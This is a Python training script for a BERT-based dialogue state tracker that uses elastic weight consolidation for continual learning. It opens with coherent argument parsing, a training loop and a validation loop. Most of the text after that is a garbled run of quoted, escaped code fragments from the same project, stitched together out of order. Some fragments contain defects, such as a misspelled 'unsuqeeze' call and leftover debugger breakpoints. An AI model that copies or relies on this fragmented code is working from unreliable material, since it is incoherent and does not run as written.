    parser.add_argument("--do_lower_case", action='store_true',
                        help="Set this flag if you are using an uncased model.")
    parser.add_argument("--set_label_encoder_trainable", action='store_true',
                        help="Set this flag if you want to set the label encoder trainable. "
                             "This option is valid only when using label embeddings.")
    parser.add_argument("--distance_metric", type=str, default="cosine",
                        help="The metric for distance between label embeddings: cosine, euclidean.")
    parser.add_argument("--train_batch_size", default=4, type=int,
                        help="Total batch size for training.")
    parser.add_argument("--dev_batch_size", default=1, type=int,
                        help="Total batch size for validation.")
    parser.add_argument("--eval_batch_size", default=16, type=int,
                        help="Total batch size for eval.")
    parser.add_argument("--learning_rate", default=5e-5, type=float,
                        help="The initial learning rate for Adam.")
    parser.add_argument("--num_train_epochs", default=3.0, type=float,
                        help="Total number of training epochs to perform.")
    parser.add_argument("--patience", default=10.0, type=float,
                        help="The number of epochs to wait for a validation improvement before stopping.")
    parser.add_argument("--warmup_proportion", default=0.1, type=float,
                        help="Proportion of training to perform linear learning rate warmup for. "
                             "E.g., 0.1 = 10%% of training.")
    parser.add_argument("--lambda_ewc", default=0.1, type=float,
                        help="Hyper-parameter for EWC")
    parser.add_argument("--no_cuda", action='store_true',
                        help="Whether not to use CUDA when available")
    parser.add_argument("--local_rank", type=int, default=-1,
                        help="local_rank for distributed training on gpus")
    parser.add_argument('--seed', type=int, default=42,
                        help="random seed for initialization")
    parser.add_argument('--gradient_accumulation_steps', type=int, default=1,
                        help="Number of updates steps to accumulate before performing a backward/update pass.")
    parser.add_argument('--fp16', action='store_true',
                        help="Whether to use 16-bit float precision instead of 32-bit")
    parser.add_argument('--loss_scale', type=float, default=0,
                        help="Loss scaling to improve fp16 numeric stability. "
                             "Only used when fp16 set to True. "
                             "0 (default value): dynamic loss scaling. "
                             "Positive power of 2: static loss scaling value.")
    parser.add_argument("--do_not_use_tensorboard", action='store_true',
                        help="Whether not to log training to tensorboard.")
    args = parser.parse_args()

    if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
        raise ValueError("Output directory ({}) already exists and is not empty.".format(args.output_dir))
    os.makedirs(args.output_dir, exist_ok=True)

    tb_file_name = args.output_dir.split('/')[1]

    # Tensorboard logging
    if not args.do_not_use_tensorboard:
        summary_writer = SummaryWriter("./%s/%s" % (args.tf_dir, tb_file_name))
    else:
        summary_writer = None

    # Mirror the log to a file in the output directory.
    fileHandler = logging.FileHandler(os.path.join(args.output_dir, "%s.txt" % tb_file_name))
    logger.addHandler(fileHandler)
    logger.info(args)

    # CUDA setup
    if args.local_rank == -1 or args.no_cuda:
        device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
        n_gpu = torch.cuda.device_count()
    else:
        torch.cuda.set_device(args.local_rank)
        device = torch.device("cuda", args.local_rank)
        n_gpu = 1
        # Initializes the distributed backend which will take care of synchronizing nodes/GPUs
        torch.distributed.init_process_group(backend='nccl')

    logger.info("device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}".format(
        device, n_gpu, bool(args.local_rank != -1), args.fp16))

    if args.gradient_accumulation_steps < 1:
        raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
            args.gradient_accumulation_steps))
    args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)

    # Set the random seeds manually for reproducibility.
    random.seed(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if n_gpu > 0:
        torch.cuda.manual_seed_all(args.seed)

    if not args.do_train and not args.do_eval and not args.do_analyze:
        raise ValueError("At least one of `do_train`, `do_eval` or `do_analyze` must be True.")
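
    # Illustrative sketch (not part of the pipeline): the batch-size rescaling
    # above means the per-forward batch shrinks under gradient accumulation while
    # the effective batch per optimizer step stays at the requested size.
    def _demo_gradient_accumulation(train_batch_size=32, gradient_accumulation_steps=4):
        per_forward = int(train_batch_size / gradient_accumulation_steps)  # 8 examples per forward pass
        effective = per_forward * gradient_accumulation_steps              # 32 examples per optimizer step
        return per_forward, effective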
\\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between label", "if n_gpu > 1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1", "power of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval", "slot value labels num_labels = [len(labels) for labels in label_list] # Number of", "acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids,", "labels in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ##", "= argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus')", "***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100 and last_update + args.patience", "eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy,", "warmup return 1.0 - x ############################################################################### # Main ############################################################################### def main(): parser =", "%s\" % \" \".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous", "action='store_true', help=\"Whether to run eval on the test set.\") args = parser.parse_args() if", "', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")),", "of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16 numeric stability. 
Only", "if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot", "x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for x in input_len])) logger.info(\"label:", "list of slots in present task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' %", "\" + text_a text_b = line[3] + \" # \" + text_b else:", "all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank ==", "logger.info(\"input_len: %s\" % \" \".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info)", "%s\" % \" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x)", "else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ###############################################################################", "[previous slots + present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer,", "prev_dev_acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" %", "i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace('", "= processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length)", "logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\"", "0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) <", "ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot ==", "% vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False if", "loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1: loss = loss /", "get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def", "t in batch) input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim() == 2:", "prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex =", "prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens:", "input_len, label_ids, prev_label_ids = batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len", "= torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes", "(max_seq_length - len(label_token_ids)) label_token_ids += 
label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids", "import FusedAdam except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use", "= dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update,", "for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)", "1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() ==", "'\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]),", "+= prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss", "% output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc =", "into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label):", "in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length)", "sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for", "Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0,", "p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0,", "sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(", "0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples", "nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot", "separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\",", "this will be truncated, and sequences shorter \\n\" \"than this will be padded.\")", "\"pricerange\": slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in", "self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target slots:", "between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\")", "else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples)", "in key): del_list.append(key) for key in del_list: del ptr_model[key] if n_gpu > 1:", "remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' 
in key): # rename rnn ->", "and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y,", "distributed training: {}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if", "class InputExample(object): \"\"\"A single training/test example for simple sequence classification.\"\"\" def __init__(self, guid,", "this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length.", "type=float, help=\"Proportion of training to perform linear learning rate warmup for. \" \"E.g.,", "all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)", "\\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples", "in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx =", "previous tasks class InputFeatures(object): \"\"\"A single set of features of data.\"\"\" def __init__(self,", "features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for", "in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for [CLS] and", "== 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc", "parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64,", "\\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1:", "and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\",", "args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler =", "as np import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed", "+= 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels", "label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len", "'0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard", "help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\",", "padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence length after WordPiece tokenization.", "training and evaluation ptr_model = torch.load(args.load_path, 
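
    # Illustrative sketch (not part of the pipeline): the no_decay grouping on a
    # toy module. Biases and LayerNorm parameters land in the weight_decay=0.0
    # group; everything else gets weight_decay=0.01, exactly as above.
    def _demo_param_groups(lr=5e-5):
        import torch.nn as nn

        class Toy(nn.Module):
            def __init__(self):
                super(Toy, self).__init__()
                self.dense = nn.Linear(4, 4)
                self.LayerNorm = nn.LayerNorm(4)

        toy = Toy()
        param_optimizer = [(n, p) for n, p in toy.named_parameters() if p.requires_grad]
        no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
        groups = [
            {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
             'weight_decay': 0.01, 'lr': lr},  # dense.weight
            {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
             'weight_decay': 0.0, 'lr': lr},   # dense.bias, LayerNorm.weight, LayerNorm.bias
        ]
        return groups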
    ###############################################################################
    # Training code
    ###############################################################################

    if args.do_train:
        logger.info("Training...")

        global_step = 0
        last_update = None
        best_loss = None

        # `ewc` carries the importance estimate of the previous task so that
        # ewc.penalty(model) penalizes drift of the parameters that mattered there.
        # NOTE: the exact constructor arguments of EWC (defined in
        # BeliefTrackerSlotQueryMultiSlotEWC) are not recoverable here.
        ewc = EWC(model, train_dataloader)

        for epoch in trange(int(args.num_train_epochs), desc="Epoch"):
            #### TRAIN
            model.train()
            tr_loss = 0
            nb_tr_examples, nb_tr_steps = 0, 0

            for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, prev_label_ids = batch

                # Restore the dialogue dimension when a single dialogue is fed.
                if input_ids.dim() == 2:
                    input_ids = input_ids.unsqueeze(0)
                    input_len = input_len.unsqueeze(0)
                    label_ids = label_ids.unsqueeze(0)
                    prev_label_ids = prev_label_ids.unsqueeze(0)

                if n_gpu == 1:
                    loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                               target_slot=target_slot_id)
                    loss_ewc = ewc.penalty(model)
                    loss = loss_ + args.lambda_ewc * loss_ewc
                else:
                    loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                       target_slot=target_slot_id)
                    loss_ = loss_.mean()
                    acc = acc.mean()
                    acc_slot = acc_slot.mean(0)
                    loss = loss_ + args.lambda_ewc * ewc.penalty(model)

                if args.gradient_accumulation_steps > 1:
                    loss = loss / args.gradient_accumulation_steps

                if args.fp16:
                    optimizer.backward(loss)
                else:
                    loss.backward()

                if summary_writer is not None and n_gpu == 1:
                    for i, slot in enumerate(processor.target_slot):
                        summary_writer.add_scalar("Train/Acc_%s" % slot.replace(' ', '_'),
                                                  acc_slot[i], global_step)

                tr_loss += loss.item()
                nb_tr_examples += input_ids.size(0)
                nb_tr_steps += 1

                if (step + 1) % args.gradient_accumulation_steps == 0:
                    # modify learning rate with special warm up BERT uses
                    lr_this_step = args.learning_rate * warmup_linear(global_step / t_total,
                                                                      args.warmup_proportion)
                    for param_group in optimizer.param_groups:
                        param_group['lr'] = lr_this_step
                    optimizer.step()
                    optimizer.zero_grad()
                    global_step += 1

            # Perform evaluation on the validation dataset
            model.eval()
            dev_loss = 0
            dev_acc = 0
            dev_loss_slot, dev_acc_slot = None, None
            nb_dev_examples, nb_dev_steps = 0, 0
            prev_dev_loss = 0
            prev_dev_acc = 0
            prev_dev_loss_slot, prev_dev_acc_slot = None, None
            prev_nb_dev_examples = 0

            for step, batch in enumerate(tqdm(dev_dataloader, desc="Validation")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, prev_label_ids = batch
                if input_ids.dim() == 2:
                    input_ids = input_ids.unsqueeze(0)
                    input_len = input_len.unsqueeze(0)
                    label_ids = label_ids.unsqueeze(0)
                    prev_label_ids = prev_label_ids.unsqueeze(0)

                with torch.no_grad():
                    if n_gpu == 1:
                        loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                                  target_slot=target_slot_id)
                        prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = \
                            model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                    else:
                        loss, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                          target_slot=target_slot_id)
                        prev_loss, _, prev_acc, prev_acc_slot, _ = \
                            model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                        loss, acc, acc_slot = loss.mean(), acc.mean(), acc_slot.mean(0)
                        prev_loss = prev_loss.mean()
                        prev_acc = prev_acc.mean()
                        prev_acc_slot = prev_acc_slot.mean(0)

                num_valid_turn = torch.sum(label_ids[:, :, 0].view(-1) > -1, 0).item()
                prev_num_valid_turn = torch.sum(prev_label_ids[:, :, 0].view(-1) > -1, 0).item()

                dev_loss += loss.item() * num_valid_turn
                dev_acc += acc.item() * num_valid_turn
                prev_dev_loss += prev_loss.item() * prev_num_valid_turn
                prev_dev_acc += prev_acc.item() * prev_num_valid_turn

                if n_gpu == 1:
                    if dev_loss_slot is None:
                        dev_loss_slot = [l * num_valid_turn for l in loss_slot]
                        dev_acc_slot = acc_slot * num_valid_turn
                        prev_dev_loss_slot = [l * prev_num_valid_turn for l in prev_loss_slot]
                        prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn
                    else:
                        for i, l in enumerate(loss_slot):
                            dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn
                        dev_acc_slot += acc_slot * num_valid_turn
                        for i, l in enumerate(prev_loss_slot):
                            prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn
                        prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn

                nb_dev_examples += num_valid_turn
                prev_nb_dev_examples += prev_num_valid_turn

            dev_loss = dev_loss / nb_dev_examples
            dev_acc = dev_acc / nb_dev_examples
            prev_dev_loss = prev_dev_loss / prev_nb_dev_examples
            prev_dev_acc = prev_dev_acc / prev_nb_dev_examples
            if n_gpu == 1:
                dev_acc_slot = dev_acc_slot / nb_dev_examples
                prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples

            if summary_writer is not None:
                summary_writer.add_scalar("Validate/Loss", dev_loss, global_step)
                summary_writer.add_scalar("Validate/Acc", dev_acc, global_step)
                summary_writer.add_scalar("Validate/Prev_Loss", prev_dev_loss, global_step)
                summary_writer.add_scalar("Validate/Prev_Acc", prev_dev_acc, global_step)
                if n_gpu == 1:
                    for i, slot in enumerate(processor.target_slot):
                        summary_writer.add_scalar("Validate/Loss_%s" % slot.replace(' ', '_'),
                                                  dev_loss_slot[i] / nb_dev_examples, global_step)
                        summary_writer.add_scalar("Validate/Acc_%s" % slot.replace(' ', '_'),
                                                  dev_acc_slot[i], global_step)
                    for i, slot in enumerate(processor.prev_slot):
                        summary_writer.add_scalar("Validate/Prev_Loss_%s" % slot.replace(' ', '_'),
                                                  prev_dev_loss_slot[i] / prev_nb_dev_examples, global_step)
                        summary_writer.add_scalar("Validate/Prev_Acc_%s" % slot.replace(' ', '_'),
                                                  prev_dev_acc_slot[i], global_step)

            logger.info("*** Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, "
                        "Valid prev loss=%.6f, Valid prev acc=%.6f ***"
                        % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc))

            dev_loss = round(dev_loss, 6)
            if last_update is None or dev_loss < best_loss:
                # Save a trained model
                output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
                if args.do_train:
                    if n_gpu == 1:
                        torch.save(model.state_dict(), output_model_file)
                    else:
                        torch.save(model.module.state_dict(), output_model_file)

                last_update = epoch
                best_loss = dev_loss
                best_acc = dev_acc
                logger.info("*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***"
                            % (last_update, best_loss, best_acc))
            else:
                logger.info("*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***"
                            % (epoch, dev_loss, dev_acc))

            if last_update + args.patience <= epoch:  # early stopping
                break
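
    # Illustrative sketch (not part of the pipeline): a minimal diagonal-Fisher EWC
    # penalty of the kind ewc.penalty(model) computes. The real EWC class lives in
    # BeliefTrackerSlotQueryMultiSlotEWC; this toy version only shows the quadratic
    # anchoring term sum_i F_i * (theta_i - theta*_i)^2 that --lambda_ewc scales.
    # `fisher` and `star_params` are hypothetical dicts, keyed by parameter name,
    # that would be estimated/stored after training on the previous task.
    def _demo_ewc_penalty(model, fisher, star_params):
        penalty = 0.0
        for name, param in model.named_parameters():
            if name in fisher:
                penalty = penalty + (fisher[name] * (param - star_params[name]) ** 2).sum()
        return penalty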
import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise", "length after WordPiece tokenization. \\n\" \"Sequences longer than this will be truncated, and", "or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\") ## Other", "and values are different between the training and evaluation ptr_model = torch.load(args.load_path, map_location=device)", "= \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot)", "prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ =", "lines, set_type, accumulation=False): \"\"\"Creates examples for the training and dev sets.\"\"\" prev_dialogue_index =", "n for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n,", "the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the test set.\")", "len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps)", "\\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt ==", "numpy as np import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from", "default=5e-5, type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number", "model.to(device) ## Get slot-value embeddings label_token_ids, label_len = [], [] for labels in", "args.learning_rate}, {'params': [p for n, p in param_optimizer if any(nd in n for", "apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please install apex from", "raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")", "BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task", "!= -1: try: from apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError(", "Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model", "text_b = line[3] # line[3]: system response label = [ line[4+idx] for idx", "default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN", "slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot", "get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def", "default='', type=str, required=True, help=\"Previous trained slots. ex. 
'0:1:2 or an excluding slot name", "% slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f,", "< 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size", "as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y", "total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total", "label_list] incorrect_dialogs = [] attention_draw = 5 for input_ids, input_len, label_ids in tqdm(eval_dataloader,", ")) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features +=", "dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc", "for label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids =", "select slots to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx = sorted([", "2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids,", "eval on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and", "len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps)", "embeddings ## Note: slot embeddings are ordered as [previous slots + present target", "+ l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l in", "Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n, p", "(epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update is None", "raise ValueError('nbt type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC", "np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if x < warmup:", "* nb_eval_ex for l in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i]", "ordered as [previous slots + present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot,", "else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out,", "slot idx to train model. ex. 
'0:1:2 or an excluding slot name 'attraction'\"", "/ nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot", "= tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids", "('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup and value_lookup del_list.append(key)", "all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f", "= loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss =", "is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\",", "prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device),", "args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running", "fp16 